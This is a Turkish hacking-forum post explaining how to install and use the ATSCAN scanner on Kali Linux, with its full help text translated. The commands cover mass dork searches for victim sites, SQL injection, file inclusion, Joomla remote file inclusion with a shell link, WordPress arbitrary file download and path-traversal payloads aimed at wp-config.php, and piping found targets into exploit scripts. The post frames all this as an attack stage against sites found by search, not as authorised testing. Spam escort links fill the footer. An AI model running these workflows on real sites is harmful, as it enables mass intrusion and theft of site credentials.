ATSCAN kullanımı

netdevilz

Yeni Üye
Katılım
21 Şub 2018
Mesajlar
5
Tepkime puanı
0
Puanları
0
Öncelikle Kali Linux ATSCAN Nedir ?

ATSCAN, kısaca dork aramaya, hedef site üzerinde ki script buglarını bulmaya, server üzerinde belirli tespit ve analiz yapmaya, encode ve decode gibi bir çok işlevleri olan çok özellikli bir tooldur. Kali Linux’u indirmek için buraya tıklaya bilirsiniz.
[hide]
KURULUM

Kurulum konusundan bahsedecek olursak; ATSCANTR olarak kullanılabilmekte ancak ben bu tür toolların ingilizce kullanılmasını tavsiye ederim. Videoda da ingilizce olarak ele aldım. Videoda kurulum esnasında terminale şunları yazarak kurulumu gerçekleştiriyoruz sırası ile ;

git clone https://github.com/AlisamTechnology/ATSCAN 
cd ATSCAN 
chmod +x ./atscan.pl
chmod +x ./install.sh 
./install.sh

KULLANIM

Kurulum aşamasını geçtikten sonra Kullanımından bahsedecek olursak. Oldukça kullanışlı olduğunu sizde “atscan –h “ yazarak görebilirsiniz. Şimdi temel olarak sistemi açıklarını aktif olarak belirli bir seviye dizgisinde taramaya yarıyor. Server, İP ve Firewall Bilgilerini bu program aracılığı ile yapabiliyoruz. Aşağıda paylaştığım videoda basit ve orta derecede kullanımından bahsettim nasıl kullanıldığı ile alakalı olarak aklınızda bir pratik olması açısından. Videonun altında help fonksiyonu altındaki tüm içeriği türkçe olarak paylaşacağım.

Ayrıca Videoda Bahsetmeyi unuttuğum bir şey daha var. Terminalde “atscan –interactive” yazarsanız ve “options” yazarsanız “normal” ve “advenced” seviyede tarama modlarını görebilirsiniz. Burada değerler default olarak “0” değerindedir. Belirli bir seviyede devam etmek isterseniz. Oldukça işlemleriniz kolaylaşabilir. İlgili ekran görüntüsü :


kalilinuxatscan1.png

SALDIRI

Saldırı aşamasında örnek basit bi sqlmap aracı ile sql injection gerçekleştirdik. Videonun uzamaması için. Bunun haricinde XSS saldırıları ve verilen İp bilgileri ile nmap soruları gerçekleştirilebilir. Server bilgisinden saldırılar gerçekleştirilebilinir. Bunlar tamamen Kullanıcının bilgisine bağlı olarak değişiklik gösterecektir.

[video=youtube]

Aşağıya komut arşivini de bırakayım.

Kod:
–proxy       | Taramalar icin proxy’yi ayarla [EX: –proxy “socks://localhost:9050”]
| proxy ayarla [EX: –proxy “http://12.45.44.2:8080”]
| proxy listesi ayarla [EX: –proxy list.txt]
-m             | Arama motorlarini varsayilan bing EX olarak ayarlayin: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
–proxy-random | Rastgele proxy [EX: –proxy-random list.txt] or –proxy-random “socks://localhost:9050”]
–m-random     | Tum disponibles motorlarinin rastgele
–brandom      | Tum disponibles ajanlari rastgele
–timeout      | Tarayici zaman asimini ayarla (saniye olarak)
–freq        | Rasgele zaman frekansi (saniye olarak)
–dork | -d    | Aranacak dork [Or: house [OTHER] cars [OTHER] otel]
-t             | Hedef
–level | -l   | Tarama duzeyi (+ – Taranacak sayfa sonuclari sayisi)
-p             | EX test parametresini ayarlayin:id,cat,product_ID
–save | -s    | Cikti dosyasi.
–source       | Html cikti klasoru.
–content      | Yanit icerigini yazdir.
–data        | veri. Orneklere bak
–post        | Posta yontemini kullan
–get          | Alma yontemini kullan
–header       | Basliklari ayarla.
–host        | Alan adi [Ex: site.com]
–nobanner     | Arac seridini gizle
–beep        | Pozitif tarama bulunursa uyari sesi cikar.
–ifend        | Tarama islemi bittiginde bip sesi cikar.
–noinfo       | Ekstra sonuc bilgisi atla.
–limit        | Tarama, tanimlanan miktarda pozitif sonuclara ulastiginda duraklatin
–valid | -v   | Dize olarak dogrulama
–status       | Http ustbilgi durumuna gore dogrulama
–ifinurl      | Tam dizeyle eslesen hedefleri alin
–sregex       | Tam esleme ile eslesen hedefleri alin
–unique       | Tam dork eslesen hedefleri alin
–replace      | Degistirilecek dize
–with        | Ile degistirilecek dizge
–full        | –replace –full Dizeden tum url parametrelerini sonuna kadar degistirecek
–payload      | Arac yukleri yerine kendi yuklerini kullan
–exp          | Exploit/Payload
–sql          | Xss tarama
–lfi          | Yerel dosya dahil etme
–joomrfi      | Joomla yerel dosya icerigini tara.
–shell        | Shell link [Ex: http://www.site.com/shell.txt]
–wpafd        | Keyfi dosya indirmek icin wordpress sitelerini tara
–admin        | Site yonetici sayfasi alin
–shost        | Site alt alanlari bulun
–tcp          | TCP port
–udp          | UDP port
–sites        | Sunucudaki siteler
–wp           | Sunucudaki WordPress siteleri
–joom        | Sunucudaki joomla siteleri
–upload       | Sunucuda yukleme dosyalari olan siteleri alin
–zip          | Sunucuda zip dosyalari bulunan siteleri alma
–md5          | Md5’e donusturun
–encode64     | Base64 dizesini kodla
–decode64     | Base64 dizgesini cozer
–TARGET       | Harici komutla hedef tarafindan degistirilecek
–HOST        | Harici komutla ana bilgisayarla degistirilecek
–HOSTIP       | Degistirilecek extern komutunda ana bilgisayar IP
–PORT        | Harici komutla acik port degistirilecek
–ip           | Ips almak icin tarama yapin
–regex        | Regex ile eslesen dizeleri almak icin tarama yapin
–noquery      | Dize degerini Query URL’sinden kaldir [ex: site.com/index.php?id=string]
–command      | Calistirmak icin Extern Komutanligi
–email        | E-postalar alin
rang(x-y)      | Ornek: –exp “/index.php?id=rang(1-9)” –sql OR -t “site.com/index.php?id=rang(1-9)” –sql
| site.com/index.php?id=1->9
repeat(txt-y) | Ornek: –exp “/index.php?id=repeat(../-9)wp-config.php” –sql OR -t “site.com/index.php?id=../wp-config.php”
| In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[DATA/DATAFILE]| To separate data values ex: –data “name:username [DATA]email:xxxxxx [DATA]pass:xxxxx”
| Wordlist: –data “name:username [DATA]email:xxxx@xx.com [DATAFILE]pass:/root/Desktop/list.txt”
[OTHER]        | Diger tum degerleri ayri tutmak icin (dork exploit payload proxy target..) ornek: –dork “dork1 [OTHER]DORK2 [OTHER]DORK3”
–pass        | Arac parolasini ayarlayin veya duzenleyin
–config       | Yapilandirmayi ayarla.
–update       | Araci guncelle.
–uninstall    | Araci kaldir

———————————————————————————-
[::] Ornekler:
———————————————————————————-
PROXY:
Tor: –proxy socks://localhost:9050
Proxy: –proxy <proxy> [Ex: http://12.32.1.5:8080] | –proxy <list.txt>.

———————————————————————————-
SET HEADERS:
–header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1”

———————————————————————————-
RASTGELE
Rastgele proxy: –proxy-random [proxy | list.txt]
Rastgele ajan: –b-random
Rasgele motor: –m-random

———————————————————————————-
ARAMA MOTORU:
Arama: atscan –dork <dork> –level <level>
Arama: atscan -d <dork> -l <level>
Motor ayarla: atscan –dork <dork> –level <level> -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Secici motorlari ayarla: atscan -d <dork> -l <level> -m 1,2,3..
Bircok dork ile arama yapin: atscan –dork <dork1 [OTHER]dork2 [OTHER]dork3> –level <level>
Arama ve rand: atscan -d <dork> -l <level> –exp “/index.php?id=rang(1-9)” –sql
Sunucu sitelerini edinin: atscan -t <ip> –level <value> –sites
Sunucu wordpress sitelerini edinin: atscan -t <ip> –level <value> –wp
Sunucu joomla sitelerini edinin: atscan -t <ipbgn-ipend> –level <value> –joom
Sunucu yukleme sitelerini edinin: atscan -t <ip> –level <value> –upload
Server zip sitelerini alin: atscan -t <ip> –level <value> –zip
WP Arbitry Dosya indirme: atscan -t <ip> –level <value> –wpafd
Joomla RFI: atscan -t <ip> –level <10> –joomfri –shell <shell link>
Arama + cikis: atscan –dork <dorks.txt> –level <level> –save

Arama + e-postalari alin: atscan -d <dorks.txt> -l <level> –email
Arama + site e-postalari alin: atscan –dork <site:site.com> –level <level> –email
E-postalari belirt: atscan -d <dorks.txt> -l <level> –email -v “@gmail | @yahoo ..”
Arama + ips almak: atscan –dork <dork> –level <level> –ip

———————————————————————————-
DUZENLI IFADELER:
Regex kullanimi: atscan [–dork <dork> | -t <target>] –level <level> –regex <regex>
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: ((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\\-+)|([A-Za-z0-9]+\\.+)|([A-Za-z0-9]+\\++))*[A-Za-z0-9]+@((\\w+\\-+)|(\\w+\\.))*\\w{1,63}\\.[a-zA-Z]{2,6})

———————————————————————————-
REPEATER:
atscan -t “site.com?index.php?id=rang(1-10)” –sql
atscan -t <target> –exp “/index.php?id=rang(1-10)” –sql
atscan -t <target> –exp “/index.php?id=repeat(../-9)wp-config.php”

———————————————————————————-
PORTS:
atscan -t <ip> –port <port> [–udp | –tcp]
atscan -t (ip start)-(ip end) –port <port> [–udp | –tcp]
atscan -t <ip> –port (port start)-(port end) [–udp | –tcp] –command “Harici komutlar”

———————————————————————————-
ENCODE / DECODE:
Generate MD5: –md5 <string>
Encode base64: –encode64 <string>
Decode base64: –decode64 <string>

———————————————————————————-
POST/GET DATA:
Post data: atscan -t <target> –data “field1:value1[DATA]field2:value2[DATA]field3:value3” –post | –get
atscan -t <target> –data “username:john[DATA]pass:1234 –post | –get
Wordlist: atscan -t <target> –data “name:username [DATA]email:xxxx@xx [DATAFILE]pass:/root/Desktop/list.txt”
Post + Validation: –data “name:userfile[DATAFILE]value:file.txt” -v <string> | –status <code> –post | –get

———————————————————————————-
HARICI KOMUTLAR:
atscan –dork <dork | dorks.txt> –level <level> –command “curl -v –TARGET”
atscan –dork <dork | dorks.txt> –level <level> –command “curl -v –HOST”
atscan –dork <dork | dorks.txt> –level <level> –command “nmap -sV -p 21,22,80 –HOSTIP”
atscan -t <target> –port 80 –udp –command “nmap -sV -p –PORT –TARGET”
atscan -d “index of /lib/scripts/dl-skin.php” -l 20 -m 2 –command “php WP-dl-skin.php-exploit.php –TARGET”

———————————————————————————-
COKLU TARAMA:
atscan –dork <dork> –level <10> –sql –lfi –wp ..
atscan –dork <dork> –level <10> –replace <string> –with <string> –exp <exploit> [–sql | –lfi | –wp |…]
atscan -t <ip> –level <10> [–sql | –lfi | –wp |…]
atscan -t <targets> [–sql | –lfi | –wp |…]

———————————————————————————-
PAYLOAD’LARIN KULLANIMI:
atscan –dork <dork> –level <10> [–lfi | –sql ..] –payload <payload | payloads.txt>

———————————————————————————-
ARAMA VALIDASYONU:
atscan -d <dork | dorks.txt> -l <level> –status <code> | –valid <string>
atscan -d <dork | dorks.txt> -l <level> –ifinurl <string>
atscan -d <dork | dorks.txt> -l <level> –regex <regex> –valid <string>
atscan -d <dork | dorks.txt> -l <level> –unique

———————————————————————————-
TARAMA TEYITATI:
atscan -t <target | targets.txt> [–status <code> | –valid <string>]
atscan -d <dork | dorks.txt> -l <level> –exp <payload> –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –status <code> | –valid <string>
atscan -d <dork | dorks.txt> -l <level> [–admin | –sql ..] –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –full –status <code> | –valid <string>
atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –exp <payload> –status <code> | –valid <string>
atscan –data “name:userfile[DATAFILE]value:file.txt” –post -v <string> | –status <code>
atscan -d <dork | dorks.txt> -l <level> [–sql | –shost ..] –status <code> | –valid <string&g
[/hide] Hide Taglarını bu seferlik düzeltim bundan sonra dikkatli şekilde kullanalım - TurKLoJeN
 

TurKLoJeN

Özel Üye
Katılım
7 Tem 2015
Mesajlar
1,015
Tepkime puanı
3
Puanları
0
Yaş
34
Web sitesi
www.turklojen.tk
Konu anlatımı güzel gibi gözükmekte lakin hide taglarını kullanınız ayrıca video silinmiş tekrar eklemenizi rica ediyorum
 

mersin escort bodrum escort alanya escort kayseri escort konya escort marmaris escort bodrum escort krill kidz vozol puff sakarya escort sakarya escort bayan serdivan escort adapazarı escort
Üst
Copyright® Ajanlar.org 2012